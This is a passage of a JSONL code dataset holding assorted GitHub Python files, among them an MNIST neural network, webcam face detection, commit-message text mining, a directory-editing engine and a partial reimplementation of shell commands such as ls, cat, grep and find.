loss\n pred = output.argmax(dim=1, keepdim=True) # get the index of the max log-probability\n correct += pred.eq(target.view_as(pred)).sum().item()\n\n test_loss /= len(test_loader.dataset)\n\n print('\\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\\n'.format(\n test_loss, correct, len(test_loader.dataset),\n 100. * correct / len(test_loader.dataset)))\n\n","repo_name":"autodeployai/ai-metadata","sub_path":"test/test_pytorch.py","file_name":"test_pytorch.py","file_ext":"py","file_size_in_byte":10908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"27607881578","text":"K = int(input())\nlst = list(input().split())\n\nans_min = 10**10\nans_max = -10**10\n\n\ndef dfs(idx, string):\n global ans_min, ans_max\n if idx == K+1:\n ans_min = min(ans_min, int(string))\n ans_max = max(ans_max, int(string))\n return\n\n for i in range(10):\n if not visited[i]:\n if idx == 0:\n visited[i] = 1\n dfs(idx + 1, string + str(i))\n visited[i] = 0\n\n else:\n if eval(string[idx-1] + lst[idx-1] + str(i)):\n visited[i] = 1\n dfs(idx + 1, string + str(i))\n visited[i] = 0\n\n\nvisited = [0] * 10\ndfs(0, '')\nprint(str(ans_max).zfill(K+1))\nprint(str(ans_min).zfill(K+1))","repo_name":"nimunsang/Algorithm","sub_path":"Implementation/2529.py","file_name":"2529.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"9375739453","text":"from data import *\n\nimages, labels, images_test, labels_test, images_validate, labels_validate = load_data()\n\n# 3 hidden layer\n# 784 -> 40 -> 30 -> 10 -> 10\nINPUTLAYER = 784\nHIDDENLAYER1 = 40\nHIDDENLAYER2 = 30\nHIDDENLAYER3 = 20\nOUTPUTLAYER = 10\n\n# global weights and biases for each layer\nweights_in_to_h1 = np.random.uniform(-0.5, 0.5, (HIDDENLAYER1, INPUTLAYER))\nweights_h1_to_h2 = np.random.uniform(-0.5, 0.5, (HIDDENLAYER2, HIDDENLAYER1))\nweights_h2_to_h3 = np.random.uniform(-0.5, 0.5, (HIDDENLAYER3, HIDDENLAYER2))\nweights_h3_to_out = np.random.uniform(-0.5, 0.5, (OUTPUTLAYER, HIDDENLAYER3))\nbias_in_to_h1 = np.zeros((HIDDENLAYER1, 1))\nbias_h1_to_h2 = np.zeros((HIDDENLAYER2, 1))\nbias_h2_to_h3 = np.zeros((HIDDENLAYER3, 1))\nbias_h3_to_out = np.zeros((OUTPUTLAYER, 1))\n\n# for plotting accuracy vs epoch\nrecord_train = []\nrecord_validate = []\nrecord_cost = []\n\n\ndef forward_propagation(image):\n # multiply weights by the input matrix: weights_in_to_h1 @ image\n # add the bias: + bias_in_to_h1\n # run it through an activation function to normalize, we are using sigmoid\n\n # Forward propagation input -> hidden1\n hidden1 = sigmoid(bias_in_to_h1 + weights_in_to_h1 @ image)\n # Forward propagation hidden1 -> hidden2\n hidden2 = sigmoid(bias_h1_to_h2 + weights_h1_to_h2 @ hidden1)\n # Forward propagation hidden2 -< hidden3\n hidden3 = sigmoid(bias_h2_to_h3 + weights_h2_to_h3 @ hidden2)\n # Forward propagation hidden3 -> output\n output = sigmoid(bias_h3_to_out + weights_h3_to_out @ hidden3)\n\n return output, hidden1, hidden2, hidden3\n\n\ndef backward_propagation(img, label, output, hidden1, hidden2, hidden3):\n # make sure we are grabbing the weights defined globally\n global weights_in_to_h1, weights_h1_to_h2, weights_h2_to_h3, weights_h3_to_out\n global bias_in_to_h1, bias_h1_to_h2, bias_h2_to_h3, bias_h3_to_out\n\n # TODO: employ validation tester results to this instead\n # Backpropagation output -> hidden3 (cost function derivative)\n delta_output = output - label\n weights_h3_to_out += -learn_rate * delta_output @ np.transpose(hidden3)\n bias_h3_to_out += -learn_rate * delta_output\n\n # Backpropagation hidden3 -> hidden2 (activation function derivative)\n delta_hidden3 = np.transpose(weights_h3_to_out) @ delta_output * deriv_sigmoid(hidden3)\n weights_h2_to_h3 += -learn_rate * delta_hidden3 @ np.transpose(hidden2)\n bias_h2_to_h3 += -learn_rate * delta_hidden3\n\n # Backpropagation hidden2 -> hidden1 (activation function derivative)\n delta_hidden2 = np.transpose(weights_h2_to_h3) @ delta_hidden3 * deriv_sigmoid(hidden2)\n weights_h1_to_h2 += -learn_rate * delta_hidden2 @ np.transpose(hidden1)\n bias_h1_to_h2 += -learn_rate * delta_hidden2\n\n # Backpropagation hidden1 -> input (activation function derivative)\n delta_hidden1 = np.transpose(weights_h1_to_h2) @ delta_hidden2 * deriv_sigmoid(hidden1)\n weights_in_to_h1 += -learn_rate * delta_hidden1 @ np.transpose(img)\n bias_in_to_h1 += -learn_rate * delta_hidden1\n\n\n# main training code ----------------------------------------------------------\nlearn_rate = LEARNING_RATE\nepochs = EPOCHS\nnum_correct = 0\nfor epoch in range(epochs):\n error_avg_sum = 0\n for img, label in zip(images, labels):\n # needed to change from vector to a matrix\n img.shape += (1,)\n label.shape += (1,)\n\n # Forward propagation -----------------------------\n output, hidden1, hidden2, hidden3 = forward_propagation(img)\n\n # Loss + Error calculation\n error_avg_sum += mean_squared_error(output, label)[0]\n num_correct += int(np.argmax(output) == np.argmax(label))\n\n # Backpropagation ---------------------------------\n backward_propagation(img, label, output, hidden1, hidden2, hidden3)\n\n # Show accuracy for this epoch\n accuracy = round((num_correct / images.shape[0]) * 100, 2)\n num_correct = 0\n # Calculate average loss for this epoch\n error_rate = round((error_avg_sum / SPLIT_TRAIN_SIZE) * 100, 2)\n # Validate against validation set for this epoch\n sum_of_correct_preds = tester(images_validate, labels_validate, forward_propagation)\n validate_length = len(images_validate)\n validation_accuracy = round(sum_of_correct_preds / validate_length * 100, 2)\n print(f\"{epoch+1}\\tAcc: {accuracy}%\\tValidation: {validation_accuracy}%\\tAvg Loss: {error_rate}\")\n\n record_train.append((epoch, accuracy))\n record_validate.append((epoch, validation_accuracy))\n record_cost.append((epoch, error_rate))\n\n\n\n# Testing on test set\nsum_of_correct_preds = tester(images_test, labels_test, forward_propagation)\ntest_length = len(images_test)\ntesting_set_acc = round(sum_of_correct_preds / test_length * 100, 2)\nprint(f\"Testing set accuracy: {testing_set_acc}%\")\n\n\n\nchat_bot_dict = {\n 1: 'DEEZ NODES SAY THAT',\n 2: '...',\n 3: 'HELLO FRIEND!',\n 4: 'USER, I BELIEVE'\n}\n\n# Show results ctrl-c out or 20 times\n#while True:\nif SHOWTEST == True:\n for i in range(20):\n #index = int(input(\"Enter a number (0 - 59999): \"))\n index = np.random.randint(0, len(img))\n img = images[index]\n plt.imshow(img.reshape(28, 28), cmap=\"Greys\")\n\n img.shape += (1,)\n output, hidden1, hidden2, hidden3 = forward_propagation(img)\n\n text = chat_bot_dict[np.random.randint(1, 5)]\n plt.title(f\"{text} THE ANSWER IS: {output.argmax()} :D\")\n plt.show()\n","repo_name":"afnleaf/MNIST_NeuralNet","sub_path":"nn_3layer.py","file_name":"nn_3layer.py","file_ext":"py","file_size_in_byte":5423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"18516507496","text":"import cv2\r\n\r\ncas_classifier = cv2.CascadeClassifier('HAARCascadeFaceDetection/haarcascade_frontalface_default.xml')\r\ncap = cv2.VideoCapture(0)\r\n# Capture frame-by-frame\r\nwhile True:\r\n ret, frame = cap.read()\r\n gray = cv2.cvtColor(frame, 0)\r\n detections = cas_classifier.detectMultiScale(gray,scaleFactor=1.3,minNeighbors=5)\r\n if(len(detections) > 0):\r\n (x,y,w,h) = detections[0]\r\n frame = cv2.rectangle(frame,(x,y),(x+w,y+h),(150,0,150),2)\r\n cv2.imshow('frame',frame)\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n \tbreak\r\n\r\n#release the capture\r\ncap.release()\r\ncv2.destroyAllWindows()","repo_name":"ManavTriesStuff/FaceDetection","sub_path":"FaceDetect.py","file_name":"FaceDetect.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"42634689727","text":"from turtle import *\ntela = Screen()\ncao = Turtle()\ncao.color(\"red\")\ncao.forward(70)\ncao.right(90)\ncao.forward(200)\ngato = Turtle()\ngato.color(\"blue\")\ngato.right(90)\ngato.forward(200)\ngato.left(90)\ngato.forward(70)\nlebre = Turtle()\nlebre.color(\"green\")\nlebre.forward(120)\nlebre.right(90)\nlebre.forward(200)\nlebre.right(90)\nlebre.forward(50)\npangolim = Turtle()\npangolim.color(\"yellow\")\npangolim.right(90)\npangolim.forward(240)\npangolim.left(90)\npangolim.forward(70)\npangolim.left(90)\npangolim.forward(40)\n","repo_name":"in1076/in1076.github.io","sub_path":"_site/programas/01_caotaruga.py","file_name":"01_caotaruga.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"43730117002","text":"import pandas as pd\nimport string\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom PIL import Image\nimport wordcloud\nfrom collections import Counter\nimport os\nimport re\nimport nltk\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize, sent_tokenize\nfrom nltk.stem import WordNetLemmatizer, PorterStemmer, SnowballStemmer\n\n\n# Read the data\ndf = pd.read_csv('final.csv')\n\n\nnltk.data.path.append('/home/mahshid/nltk_data/corpora/stopwords')\n\n# Download the stopwords corpus from NLTK\nstop_words = set(stopwords.words('english'))\nnltk.download('punkt')\nnltk.download('wordnet')\n\n# Define a function to preprocess text\ndef preprocess_text(text):\n\n # Convert to lowercase\n text = text.lower()\n\n # Tokenize the text into words\n words = word_tokenize(text)\n\n\n # Remove Unicode Characters\n text = re.sub(r\"(@\\[A-Za-z0-9]+)|([^0-9A-Za-z \\t])|(\\w+:\\/\\/\\S+)|^rt|http.+?\", \" \", text)\n text = re.sub(r\"(@\\[A-Za-z0-9]|^rt|http.+?)|(git-svn-id)|(://svn.apache.org/repos/asf/jakarta)|([^0-9A-Za-z \\t])|(\\w+:\\/\\/\\S+)\",\" \",text)\n \n # Remove Digit\n new_str = \"\"\n\n for c in text:\n if c.isdigit():\n new_str += \" \"\n else:\n new_str += c\n\n text = new_str\n\n text = \" \".join([word for word in text.split() if len(word) > 2])\n\n\n p = [\n \"fbbffaedef\", \"sandbox\", \"trunk\", \"license\" , \"bcel\" , \"vfs\" , \"apache\" , \"contact\" , \"address\", \"svn\", \"https\", \"www\", \"org\", \"com\",\n \"net\", \"http\", \"id\", \"gitsvnid\", \"tags\", \"branches\", \"jakarta\", \"codec\", \"commons\",\"git\", \"license\",\n \"ffaedef\", \"ffa\", \"edef\", \"and\", \"for\", \"the\"]\n\n text = list(filter(lambda x: x not in p, text.split()))\n \n\n\n # Remove stop wordsze(text)\n words = [word for word in str(text).split() if word not in stop_words]\n \n # Stem the words\n stemmer = SnowballStemmer('english')\n words = [stemmer.stem(word) for word in words]\n\n \n # Lemmatize the words\n lemmatizer = WordNetLemmatizer()\n words = [lemmatizer.lemmatize(word) for word in words]\n\n\n text = \" \".join(text)\n return text\n\n\n# Create a new dataframe for commits with improved readability\ndf_improved = df[df['readability'] > 0].copy()\n# Preprocess the commit messages in the improved readability dataframe\ndf_improved['preprocessed_commit_msg'] = df_improved['commit_msg'].apply(preprocess_text)\n\n# frequency of words\ntext_frequency = df_improved['commit_msg'].apply(preprocess_text).str.split(expand=True).stack()\ntext_frequency = Counter(text_frequency)\nmost_common_words = text_frequency.most_common(5)\nfrequency = pd.DataFrame(most_common_words, columns=['word', 'frequency'])\n\nplt.bar(frequency['word'], frequency['frequency'])\nplt.show()\n\n\n# Create a Wordcloud for improved readability\nimproved_wordcloud = wordcloud.WordCloud(collocations = False, background_color='white').generate(' '.join(df_improved['preprocessed_commit_msg']))\nplt.imshow(improved_wordcloud, interpolation='bilinear')\nplt.axis('off')\nplt.show()\n\n# Create a new dataframe for commits with decreased readability\ndf_decreased = df[df['readability'] < 0].copy()\n# Preprocess the commit messages in the decreased readability dataframe\ndf_decreased['preprocessed_commit_msg'] = df_decreased['commit_msg'].apply(preprocess_text)\n\n# frequency of words\ntext_frequency = df_decreased['commit_msg'].apply(preprocess_text).str.split(expand=True).stack()\ntext_frequency = Counter(text_frequency)\nmost_common_words = text_frequency.most_common(5)\nfrequency = pd.DataFrame(most_common_words, columns=['word', 'frequency'])\n\nplt.bar(frequency['word'], frequency['frequency'])\nplt.show()\n\n\n# Create a Wordcloud for decreased readability\ndecreased_wordcloud = wordcloud.WordCloud(collocations= False, background_color='white').generate(' '.join(df_decreased['preprocessed_commit_msg']))\nplt.imshow(decreased_wordcloud, interpolation='bilinear')\nplt.axis('off')\nplt.show()\n","repo_name":"MoonGirl99/Code-Readability-Analysis-and-Prediction","sub_path":"text mining.py","file_name":"text mining.py","file_ext":"py","file_size_in_byte":3894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"40754974126","text":"def remove_duplicate(lst):\r\n j = 0\r\n lst.sort()\r\n for i in range(len(lst) - 1):\r\n if lst[i] != lst[i + 1]:\r\n lst[j] = lst[i]\r\n j += 1\r\n lst[j] = lst[-1]\r\n for _ in range(len(lst) - j - 1):\r\n lst.pop()\r\n\r\nlst1 = [2,2,2,2,2]\r\nremove_duplicate(lst1)\r\nprint(lst1)\r\n\r\nlst2 = [5,2,3,6,4,2,5,4,3,7,8,7,6,7,8,9,4,5,7,2]\r\nremove_duplicate(lst2)\r\nprint(lst2)","repo_name":"ShangZhao2000/algorithms","sub_path":"remove_duplicate.py","file_name":"remove_duplicate.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"73315649928","text":"from __future__ import absolute_import, unicode_literals\n\nfrom .nomenclature import AirProperties, RefProperties\nfrom .safeprop import airprop, phase, refprop\n\n__banner__ = r\"\"\"\n ____ ___ ___\n / __/__ _/ _/__ / _ \\_______ ___\n _\\ \\/ _ `/ _/ -_) ___/ __/ _ \\/ _ \\\n/___/\\_,_/_/ \\__/_/ /_/ \\___/ .__/\n /_/ by Andrew Hjortland\n\"\"\"\n\n__title__ = 'safeprop'\n__summary__ = 'Wrappers for CoolProp for safe property calculations.'\n__uri__ = 'https://github.com/ahjortland/safeprop'\n\n__version__ = '0.0.1'\n\n__author__ = 'Andrew Hjortland'\n__email__ = 'andrew.hjortland@gmail.com'\n\n__license__ = 'MIT'\n__copyright__ = 'Copyright 2016 Andrew Hjortland'\n","repo_name":"abahman/safeprop","sub_path":"safeprop/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"28666229888","text":"import sys\n\nn = int(sys.stdin.readline())\nwords = [input() for _ in range(n)]\n\n# 중복제거\nwords = list(set(words))\n\nwords.sort(key=lambda x:[len(x), x])\n\nfor word in words:\n print(word)\n\n# https://www.acmicpc.net/problem/1181","repo_name":"Gajeju/Coding_test_Programming","sub_path":"bkackjoon/step/12_sort/P08_1181.py","file_name":"P08_1181.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"9436022445","text":"data ={1:'Navin',2:'kiran',4:'Harsh'}\n#print(data[1])\n#print(data.get(3))\n#print(data.get(2,'Not found'))\n#print(data.get(3,'Not found'))\nkeys=['Navin','kiran','Harsh']\nvalues=['JS','Python','Java']\ndatas=dict(zip(keys,values))#zip() in python can be used to join two files\n#print(datas)\n#print(datas['kiran'])\ndatas['Monica']=['CS']\n#print(datas['Monica'])\n#print(datas)\nprogL={'JS':'Atom','CS':'VS','Python':['Pycharm','Spyder'],'Java':{'JavaSE':'Netbeans','JavaEE':'Eclipse'}}\n#print(progL['Python'][1])\n#print(progL['Java']['JavaSE'])\ndata2=data.copy()\ndel data2[2]\n#print(data2)\n#print(data)\ndata2.update({3:'Neha'})#update() function is used to add new items to a dictionary\n#print(data2.items())\n#print(data2.keys())\nprint(data2.values())\n\n\n","repo_name":"Nirvik-Sarkar/Python-tutorial","sub_path":"Dictionary.py","file_name":"Dictionary.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"28438997520","text":"\"\"\"\nDetermines commands to be run in order to update the original directory and match\nthe state of the edit directory.\n\"\"\"\nfrom roamer.command import Command\nfrom roamer import record\nfrom roamer.entry import Entry\nfrom roamer.directory import Directory\n\nclass Engine(object):\n def __init__(self, original_dir, edit_dir):\n self.original_dir = original_dir\n self.edit_dir = edit_dir\n self.commands = []\n\n def compile_commands(self):\n self.compare_dirs()\n self.new_entries()\n self.handle_unknown_digests()\n self.save_copy_over_files_to_trash()\n\n def compare_dirs(self):\n for digest, original_entry in self.original_dir.entries.items():\n new_entries = self.edit_dir.find(digest)\n if new_entries is None:\n self.commands.append(Command('roamer-trash-copy', original_entry))\n continue\n found_original = False\n for new_entry in new_entries:\n if new_entry.name == original_entry.name:\n found_original = True\n else:\n self.commands.append(Command('cp', original_entry, new_entry))\n if not found_original:\n self.commands.append(Command('roamer-trash-copy', original_entry))\n\n def new_entries(self):\n add_blank_entries = self.edit_dir.find(None)\n if add_blank_entries:\n for entry in add_blank_entries:\n self.commands.append(Command('touch', entry))\n\n def handle_unknown_digests(self):\n unknown_digests = set(self.edit_dir.entries.keys()) - set(self.original_dir.entries.keys())\n\n for digest in filter(None, unknown_digests):\n entries = load_entries(filter_dir=self.original_dir)\n trash_entries = load_entries(trash=True)\n outside_entry = entries.get(digest) or trash_entries.get(digest)\n if outside_entry is None:\n raise Exception('digest %s not found' % digest)\n\n for entry in self.edit_dir.find(digest):\n new_entry = Entry(entry.name, self.original_dir)\n self.commands.append(Command('cp', outside_entry, new_entry))\n\n def save_copy_over_files_to_trash(self):\n trash_entries = [c.first_entry for c in self.commands if c.cmd == 'roamer-trash-copy']\n copy_over_entires = [c.second_entry.name for c in self.commands if c.cmd == 'cp']\n for entry in trash_entries:\n if entry.name not in copy_over_entires:\n self.commands.append(Command('rm', entry))\n\n def commands_to_str(self):\n string_commands = [str(command) for command in sorted(self.commands)]\n # sort so that cp comes first. Need to copy before removals happen\n return '\\n'.join(string_commands)\n\n def run_commands(self):\n return [command.execute() for command in sorted(self.commands)]\n\n\ndef load_entries(**kwargs):\n dictionary = {}\n for row in record.load(**kwargs):\n entry = Entry(row['name'], Directory(row['path'], []), row['digest'])\n dictionary[row['digest']] = entry\n return dictionary\n","repo_name":"abaldwin88/roamer","sub_path":"roamer/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":3137,"program_lang":"python","lang":"en","doc_type":"code","stars":608,"dataset":"github-code","pt":"16"}
+{"seq_id":"6889189628","text":"import argparse\nimport sys\n\nfrom cryptopyutils import dirs\n\n\ndef main():\n \"\"\"Dirs Manipulation CLI\"\"\"\n parser = argparse.ArgumentParser(description=\"DIRECTORY MANIPULATION\")\n parser.add_argument(\"action\", choices=[\"mkdir\", \"rmdir\"], help=\"Action\")\n parser.add_argument(\"dir\", help=\"Directory\")\n args = parser.parse_args()\n if args.action == \"mkdir\":\n dirs.mkdir(args.dir)\n print(\"Created folder : %s\" % args.dir)\n elif args.action == \"rmdir\":\n # prevent accidental system damage\n if args.dir in [\n \"/\",\n \"/etc\",\n \"/bin\",\n \"/boot\",\n \"/dev\",\n \"/home\",\n \"/init\",\n \"/lib\",\n \"/lib32\",\n \"/lib64\",\n \"/libx32\",\n \"/lost+found\",\n \"/media\",\n \"/mnt\",\n \"/opt\",\n \"/proc\",\n \"/root\",\n \"/run\",\n \"/sbin\",\n \"/snap\",\n \"/srv\",\n \"/sys\",\n \"/tmp\",\n \"/usr\",\n \"/var\",\n \"~\",\n \"$HOME\",\n ]:\n print(\"Cannot remove system or home directories\")\n sys.exit(1)\n # remove\n dirs.rmdir(args.dir)\n print(\"Removed folder : %s\" % args.dir)\n else:\n print(\"Command not supported\")\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"dheurtev/cryptopyutils","sub_path":"src/cryptopyutils/cli/dirs.py","file_name":"dirs.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"14131479318","text":"import re\nimport os\nfrom os import listdir\nimport glob\n\nfrom abc import ABC, abstractmethod\nfrom typing import List\n\n\nclass Application(ABC):\n \"\"\"\n Application is an abstract base class for all applications to inherit from\n It takes in arguments and returns the output ready for the output stream\n \"\"\"\n\n @abstractmethod\n def exec(self, args) -> List[str]:\n pass\n\n def raise_error(self, message, type, output) -> None:\n if self.unsafe:\n output.append(message + \"\\n\")\n else:\n if type == \"file_not_found\":\n raise FileNotFoundError(message)\n elif type == \"not_directory\":\n raise NotADirectoryError(message)\n elif type == \"value\":\n raise ValueError(message)\n elif type == \"type\":\n raise TypeError(message)\n else:\n raise RuntimeError(message)\n\n\nclass Pwd(Application):\n \"\"\"\n Pwd implements the 'pwd' shell function\n It outputs the current working directory followed by a newline.\n \"\"\"\n\n def __init__(self, unsafe) -> None:\n self.unsafe = unsafe\n\n def exec(self, args) -> str:\n return os.getcwd() + \"\\n\"\n\n\nclass Cd(Application):\n \"\"\"\n Cd implements the 'cd' shell function\n It changes the current working directory.\n \"\"\"\n\n def __init__(self, unsafe) -> None:\n self.unsafe = unsafe\n\n def exec(self, args) -> List[str]:\n output = []\n if len(args) == 0 or len(args) > 1:\n self.raise_error(\n \"Wrong number of command line arguments\",\n \"type\",\n output\n )\n if not os.path.exists(args[0]):\n self.raise_error(\n f\"No such directory: {args[0]}\",\n \"not_directory\",\n output\n )\n else:\n os.chdir(args[0])\n\n return output\n\n\nclass Ls(Application):\n \"\"\"\n Ls implements the 'ls' shell function\n Lists the content of a directory.\n It prints list of files and directories\n separated by tabs and followed by a newline.\n Ignores files and directories whose names start with '.' .\n \"\"\"\n\n def __init__(self, unsafe) -> None:\n self.unsafe = unsafe\n\n def exec(self, args) -> List[str]:\n output = []\n if len(args) == 0:\n ls_dir = os.getcwd()\n elif len(args) > 1:\n self.raise_error(\n \"Wrong number of command line arguments\",\n \"type\",\n output\n )\n ls_dir = args[0]\n else:\n ls_dir = args[0]\n if not os.path.exists(ls_dir):\n self.raise_error(\n f\"No such directory: {ls_dir}\",\n \"not_directory\",\n output\n )\n else:\n for f in listdir(ls_dir):\n if not f.startswith(\".\"):\n output.append(f + \"\\n\")\n\n return output\n\n\nclass Cat(Application):\n \"\"\"\n Cat implements the 'cat' shell function\n It concatenates the content of given files\n and prints to stdout\n \"\"\"\n\n def __init__(self, unsafe) -> None:\n self.unsafe = unsafe\n\n def exec(self, args) -> List[str]:\n output = []\n if len(args) == 0:\n self.raise_error(\"No file specified\", \"type\", output)\n return output\n for a in args:\n if \"#STDIN#\" in a:\n f = a[1:]\n for x in f:\n output.append(x)\n else:\n if not os.path.exists(a):\n self.raise_error(\n f\"No such file or directory: {a}\",\n \"file_not_found\",\n output\n )\n else:\n with open(a) as f:\n output.append(f.read())\n\n if output[-1][-2:] != \"\\n\":\n output.append(\"\\n\")\n return output\n\n\nclass Echo(Application):\n \"\"\"\n Echo implements the 'echo' shell function\n It prints its args seperated by spaces\n and followed by newline to stdout\n \"\"\"\n\n def __init__(self, unsafe) -> None:\n self.unsafe = unsafe\n\n def exec(self, args) -> str:\n return \" \".join(args) + \"\\n\"\n\n\nclass Head(Application):\n \"\"\"\n Head implements the 'head' shell function\n Prints the first N lines of a given file or stdin\n If < N lines, it prints only existing lines without raising an exception\n \"\"\"\n\n def __init__(self, unsafe) -> None:\n self.unsafe = unsafe\n\n def exec(self, args) -> List[str]:\n output = []\n file = \"\"\n\n if len(args) != 1 and len(args) != 3:\n self.raise_error(\n \"Wrong number of command line arguments\",\n \"type\",\n output\n )\n return output\n if len(args) == 1:\n num_lines = 10\n file = args[0]\n if len(args) == 3:\n if args[0] != \"-n\":\n self.raise_error(\"Wrong flags\", \"value\", output)\n return output\n else:\n num_lines = int(args[1])\n file = args[2]\n\n if \"#STDIN#\" in file:\n file = file[1]\n lines = file.split(\"\\n\")\n for i in range(0, min(len(lines), num_lines)):\n output.append(lines[i] + \"\\n\")\n else:\n if not os.path.exists(file):\n self.raise_error(\n f\"No such file or directory: {file}\",\n \"file_not_found\",\n output\n )\n else:\n with open(file) as f:\n lines = f.readlines()\n for i in range(0, min(len(lines), num_lines)):\n if i == len(lines) - 1:\n output.append(lines[i] + \"\\n\")\n else:\n output.append(lines[i])\n\n return output\n\n\nclass Tail(Application):\n \"\"\"\n Tail implements the 'tail' shell function\n Prints the last N lines of a given file or stdin\n If < N lines, it prints only existing lines\n without raising an exception\n \"\"\"\n\n def __init__(self, unsafe) -> None:\n self.unsafe = unsafe\n\n def exec(self, args) -> List[str]:\n output = []\n file = \"\"\n\n if len(args) != 1 and len(args) != 3:\n self.raise_error(\n \"Wrong number of command line arguments\",\n \"type\",\n output\n )\n return output\n if len(args) == 1:\n num_lines = 10\n file = args[0]\n if len(args) == 3:\n if args[0] != \"-n\":\n self.raise_error(\"Wrong flags\", \"value\", output)\n return output\n else:\n num_lines = int(args[1])\n file = args[2]\n\n if \"#STDIN#\" in file:\n file = file[1]\n lines = file.split(\"\\n\")\n display_length = min(len(lines), num_lines) + 1\n for i in range(0, display_length):\n output.append(lines[len(lines) - display_length + i] + \"\\n\")\n else:\n if not os.path.exists(file):\n self.raise_error(\n f\"No such file or directory: {file}\",\n \"file_not_found\",\n output\n )\n else:\n with open(file) as f:\n lines = f.readlines()\n display_length = min(len(lines), num_lines)\n for i in range(0, display_length):\n if i == display_length - 1:\n output.append(\n lines[len(lines) - display_length + i]\n + \"\\n\"\n )\n else:\n output.append(\n lines[len(lines) - display_length + i]\n )\n\n return output\n\n\nclass Grep(Application):\n \"\"\"\n Grep implements the 'grep' shell function\n It searches for lines containing a match to specified pattern\n Output of command is the list of lines found\n Each line is followed by a newline\n \"\"\"\n\n def __init__(self, unsafe) -> None:\n self.unsafe = unsafe\n\n def exec(self, args) -> List[str]:\n output = []\n if len(args) < 2:\n self.raise_error(\n \"Wrong number of command line arguments\",\n \"type\",\n output\n )\n return output\n\n pattern = args[0]\n files = args[1:]\n for file in files:\n if \"#STDIN#\" in file:\n file = file[1]\n for line in file.split(\"\\n\"):\n if line != \"\":\n if re.match(pattern, line):\n output.append(line + \"\\n\")\n else:\n if not os.path.exists(file):\n self.raise_error(\n f\"No such file or directory: {file}\",\n \"file_not_found\",\n output\n )\n else:\n with open(file) as f:\n lines = f.readlines()\n for line in lines:\n if re.match(pattern, line):\n if len(files) > 1:\n match_string = (\n file +\n \":\" +\n line.replace(\"\\n\", \"\") + \"\\n\"\n )\n output.append(match_string)\n else:\n output.append(\n line.replace(\"\\n\", \"\")\n + \"\\n\"\n )\n\n return output\n\n\nclass Cut(Application):\n \"\"\"\n Cut implements the 'cut' shell function\n It cuts out sections from each line of a given file or stdin\n Outputs result to stdout\n \"\"\"\n\n def __init__(self, unsafe) -> None:\n self.unsafe = unsafe\n\n def exec(self, args) -> List[str]:\n output = []\n if len(args) != 3:\n self.raise_error(\n \"Wrong number of command line arguments\",\n \"type\",\n output\n )\n return output\n if args[0] != \"-b\":\n self.raise_error(\"Wrong flags\", \"value\", output)\n return output\n\n bytes = args[1].split(\",\")\n indexs = []\n file = args[2]\n\n if \"#STDIN#\" in file:\n file = file[1]\n lines = file.split(\"\\n\")\n else:\n if not os.path.exists(file):\n self.raise_error(\n f\"No such file or directory: {file}\",\n \"file_not_found\",\n output\n )\n return output\n else:\n with open(file) as f:\n lines = f.readlines()\n\n for byte in bytes:\n if \"-\" not in byte:\n if (int(byte) - 1) not in indexs:\n indexs.append(int(byte) - 1)\n elif byte[0] == \"-\":\n for i in range(0, int(byte[1:])):\n if i not in indexs:\n indexs.append(i)\n elif byte[-1] == \"-\":\n for i in range(int(byte[:-1]) - 1, len(max(lines, key=len))):\n if i not in indexs:\n indexs.append(i)\n else:\n indexRange = byte.split(\"-\")\n for i in range(int(indexRange[0]) - 1, int(indexRange[1])):\n if i not in indexs:\n indexs.append(i)\n\n indexs.sort()\n\n for line in lines:\n line = line.strip(\"\\n\")\n newLine = \"\"\n for i in indexs:\n if i < len(line):\n newLine = newLine + line[i]\n output.append(newLine + \"\\n\")\n\n return output\n\n\nclass Find(Application):\n \"\"\"\n Find implements the 'find' shell function\n It recursively searches for files with matching names\n Outputs list of relative paths, each followed by newline\n \"\"\"\n\n def __init__(self, unsafe) -> None:\n self.unsafe = unsafe\n\n def exec(self, args) -> List[str]:\n output = []\n initPathLength = len(os.getcwd())\n path = args[0]\n\n def recursive_find(path):\n files = os.listdir(path)\n for file in files:\n newPath = os.path.join(path, file)\n if args[0] != \"-name\":\n # outputs absolute path if directory is given at the start\n output.append(newPath + \"\\n\")\n elif args[0] == \"-name\":\n # replace absolute path with relative path if no dir given\n output.append(\".\" + newPath[initPathLength:] + \"\\n\")\n\n if os.path.isdir(newPath):\n recursive_find(newPath)\n\n # If no directory is given, use current working directory\n if args[0] == \"-name\":\n path = os.getcwd()\n if args[0] != \"-name\" and not os.path.exists(args[0]):\n self.raise_error(\n f\"Directory given does not exist: {args[0]}\",\n \"not_directory\",\n output\n )\n return output\n if \"-name\" not in args:\n recursive_find(path)\n if args[len(args) - 1] == \"-name\":\n self.raise_error(\n \"-name requires additional arguments\",\n \"type\",\n output\n )\n return output\n\n # If globbing wildcard is given, this runs instead.\n elif len(args) > 1:\n s = args[len(args) - 1]\n 